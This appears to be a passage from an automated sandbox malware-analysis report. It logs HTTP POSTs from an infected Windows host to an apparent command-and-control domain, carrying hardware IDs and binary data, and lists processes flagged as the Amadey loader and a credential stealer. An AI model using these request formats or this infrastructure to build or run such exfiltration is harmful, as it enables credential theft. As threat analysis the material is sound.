2024-12-22 01:23:05 UTC	2779	OUT	Data Raw: cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-
2024-12-22 01:23:06 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:23:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eddgtk98vcmbhh9j4ejg12opk5; expires=Wed, 16 Apr 2025 19:09:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Id036%2BXjgrKdXDS7K%2BXw01oitqf5wc0l%2BbwG9tm6fxB6O5VsKfG3Xs3a8ZKnoIGcZcHe%2FqwtvGBUczagp07p60w1cYZpjJcWPqM0yHiL7%2FK9DjME3yygReGQdtDC857K1qSu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4df95a1b0c92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1598&rtt_var=639&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2838&recv_bytes=19064&delivery_rate=1659090&cwnd=165&unsent_bytes=0&cid=1bba072e07a76442&ts=926&x=0"
2024-12-22 01:23:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:23:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	50622	104.21.89.115	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:23:07 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5IF1BD26EUTU03521 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8773 Host: fieldhitty.click
2024-12-22 01:23:07 UTC	8773	OUT	Data Raw: 2d 2d 35 49 46 31 42 44 32 36 45 55 54 55 30 33 35 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 49 46 31 42 44 32 36 45 55 54 55 30 33 35 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 49 46 31 42 44 32 36 45 55 54 55 30 33 35 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 35 49 46 31 Data Ascii: --5IF1BD26EUTU03521Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--5IF1BD26EUTU03521Content-Disposition: form-data; name="pid"2--5IF1BD26EUTU03521Content-Disposition: form-data; name="lid"PvbArZ----5IF1
2024-12-22 01:23:08 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:23:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jmidiklfrsmk82k2jbd88i4sos; expires=Wed, 16 Apr 2025 19:09:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zhjYzTZg8PEoQHDizMMHWhCEuTQP8%2BUJJeqvkgxo6eNw6QT6wlxe76Ml51cgS8XC%2Fhfa8rcjEeE%2FDWPXdhKane7xICIlxaTrprnup96rW9UFxvuIJZYN9RggSs%2BtsGcXkhp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4e06ee5543aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13643&min_rtt=1719&rtt_var=7859&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9711&delivery_rate=1698662&cwnd=241&unsent_bytes=0&cid=501f6ee41566da26&ts=829&x=0"
2024-12-22 01:23:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:23:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	50624	104.21.89.115	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:23:10 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E1S6CM9GU1P1R User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20402 Host: fieldhitty.click
2024-12-22 01:23:10 UTC	15331	OUT	Data Raw: 2d 2d 45 31 53 36 43 4d 39 47 55 31 50 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 31 53 36 43 4d 39 47 55 31 50 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 31 53 36 43 4d 39 47 55 31 50 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 45 31 53 36 43 4d 39 47 55 31 50 31 52 0d 0a 43 Data Ascii: --E1S6CM9GU1P1RContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--E1S6CM9GU1P1RContent-Disposition: form-data; name="pid"3--E1S6CM9GU1P1RContent-Disposition: form-data; name="lid"PvbArZ----E1S6CM9GU1P1RC
2024-12-22 01:23:10 UTC	5071	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-22 01:23:11 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:23:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hqq57alu9gdo8j3srif9r8nhgf; expires=Wed, 16 Apr 2025 19:09:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sxtJLaWq2G24gMYWcYtd4JEwMXHkGJb%2BFAsIV%2B%2BAa7zMDco8m7VWA3YdbrKiWO9TWCacBzre9Kj7ZzHeZMM8yUel6zM0I3JmHc7CE9tCR%2FH%2F9J%2BTUU5Fnnl0yzD9FaSXEdJv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4e16ba2dc331-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1631&rtt_var=643&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21359&delivery_rate=1660978&cwnd=79&unsent_bytes=0&cid=6199c56eec8fa8d7&ts=921&x=0"
2024-12-22 01:23:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:23:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	50633	104.21.89.115	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:23:12 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=MT8H0EIQCCS2W6FE6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1327 Host: fieldhitty.click
2024-12-22 01:23:12 UTC	1327	OUT	Data Raw: 2d 2d 4d 54 38 48 30 45 49 51 43 43 53 32 57 36 46 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4d 54 38 48 30 45 49 51 43 43 53 32 57 36 46 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 54 38 48 30 45 49 51 43 43 53 32 57 36 46 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 4d 54 38 48 Data Ascii: --MT8H0EIQCCS2W6FE6Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--MT8H0EIQCCS2W6FE6Content-Disposition: form-data; name="pid"1--MT8H0EIQCCS2W6FE6Content-Disposition: form-data; name="lid"PvbArZ----MT8H
2024-12-22 01:23:13 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:23:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=30m8vfksrepnn1jon1omcfucis; expires=Wed, 16 Apr 2025 19:09:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5w%2F5dy47XhIBCVYER3rfADxE64u6ej%2FIJne8%2FM68xJRHF3IcefPYFJ0A%2FHY00Z%2FnvENHXQg3TWp3AKtLgnhykVVHFe4t%2FdYpclubLR%2FWl7I%2FH%2FICPUxuFDSNiMYE9FoS7avT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4e249b42c33f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1597&rtt_var=610&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2243&delivery_rate=1779402&cwnd=235&unsent_bytes=0&cid=25b8d0d24ed80712&ts=780&x=0"
2024-12-22 01:23:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:23:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	50636	104.21.89.115	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:23:14 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OZ4DZWB5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29501 Host: fieldhitty.click
2024-12-22 01:23:14 UTC	15331	OUT	Data Raw: 2d 2d 4f 5a 34 44 5a 57 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 5a 34 44 5a 57 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 5a 34 44 5a 57 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 4f 5a 34 44 5a 57 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 Data Ascii: --OZ4DZWB5Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--OZ4DZWB5Content-Disposition: form-data; name="pid"1--OZ4DZWB5Content-Disposition: form-data; name="lid"PvbArZ----OZ4DZWB5Content-Disposition:
2024-12-22 01:23:14 UTC	14170	OUT	Data Raw: d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 cc 8f f2 84 31 cb 5f 31 6d fe 58 5d 72 1b 54 9a b4 da cf af 82 84 7b 17 55 3b cb 03 b6 af 9b a8 f5 ad 74 ab 91 ef 75 c2 46 bc 57 3f fb b6 Data Ascii: 5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom;z/o^R=ZHMyd01_1mX]rT{U;tuFW?
2024-12-22 01:23:15 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:23:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1siplhe6en9n78iv3leev9u3bn; expires=Wed, 16 Apr 2025 19:09:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QTYapNTbSIfICoA4u%2BE%2B%2FYG5bA12Z%2BfaYx2MkhSKvT2C7UEr7YZ3HD2ZwR6KPHQJspdKJogxMhx1DykXkhUeWHp3UQZpAw3JHKse8cpR%2FL12EnGJZDDXi4CLkpuG8R2z%2B4MO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4e3218dc9e08-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1834&rtt_var=711&sent=19&recv=34&lost=0&retrans=0&sent_bytes=2838&recv_bytes=30475&delivery_rate=1515308&cwnd=163&unsent_bytes=0&cid=1d48780d703afb57&ts=969&x=0"
2024-12-22 01:23:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:23:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	50639	104.21.89.115	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:23:16 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: fieldhitty.click
2024-12-22 01:23:16 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 76 62 41 72 5a 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PvbArZ--&j=&hwid=F14195A540BC0B98AC8923850305D13E
2024-12-22 01:23:17 UTC	1123	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:23:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8sk20ov9mtiahk7kk1bt40720p; expires=Wed, 16 Apr 2025 19:09:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBCAULZ6tdmE5DROY0AzKcuvbdsXZczqAGKibE4ZkaqQUIseixbpnbGcNJcjlrrA%2Bz1DpFKv0iBNZEetlXCT5bn2c1E2%2FhvlOiYFCyJ9ajvU0y5QX9jreJbFUaJ6sS3f%2FRM%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4e408e241849-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1480&rtt_var=577&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=977&delivery_rate=1859872&cwnd=180&unsent_bytes=0&cid=b519b22b5e7e3201&ts=792&x=0"
2024-12-22 01:23:17 UTC	54	IN	Data Raw: 33 30 0d 0a 69 47 76 48 50 61 2b 70 59 56 5a 63 38 75 75 54 35 68 6a 74 33 51 4b 43 4a 47 72 2b 6f 70 63 4a 76 33 6e 69 30 78 76 6a 6f 42 6e 54 4e 67 3d 3d 0d 0a Data Ascii: 30iGvHPa+pYVZc8uuT5hjt3QKCJGr+opcJv3ni0xvjoBnTNg==
2024-12-22 01:23:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	20:15:00
Start date:	21/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x850000
File size:	3'263'488 bytes
MD5 hash:	CF6393E173FB6315D0C681BC78EB3528
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:15:04
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x9a0000
File size:	3'263'488 bytes
MD5 hash:	CF6393E173FB6315D0C681BC78EB3528
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:16:00
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x9a0000
File size:	3'263'488 bytes
MD5 hash:	CF6393E173FB6315D0C681BC78EB3528
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	20:16:15
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe"
Imagebase:	0xc0000
File size:	2'668'544 bytes
MD5 hash:	87330F1877C33A5A6203C49075223B16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 22%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	20:16:22
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
Imagebase:	0x330000
File size:	776'832 bytes
MD5 hash:	AFD936E441BF5CBDB858E96833CC6ED3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 68%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:16:22
Start date:	21/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	20:16:25
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
Imagebase:	0x330000
File size:	776'832 bytes
MD5 hash:	AFD936E441BF5CBDB858E96833CC6ED3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:16:25
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
Imagebase:	0x330000
File size:	776'832 bytes
MD5 hash:	AFD936E441BF5CBDB858E96833CC6ED3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2690845654.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2690960983.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	20:16:30
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe"
Imagebase:	0xf70000
File size:	1'861'632 bytes
MD5 hash:	15709EBA2AFAF7CC0A86CE0ABF8E53F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
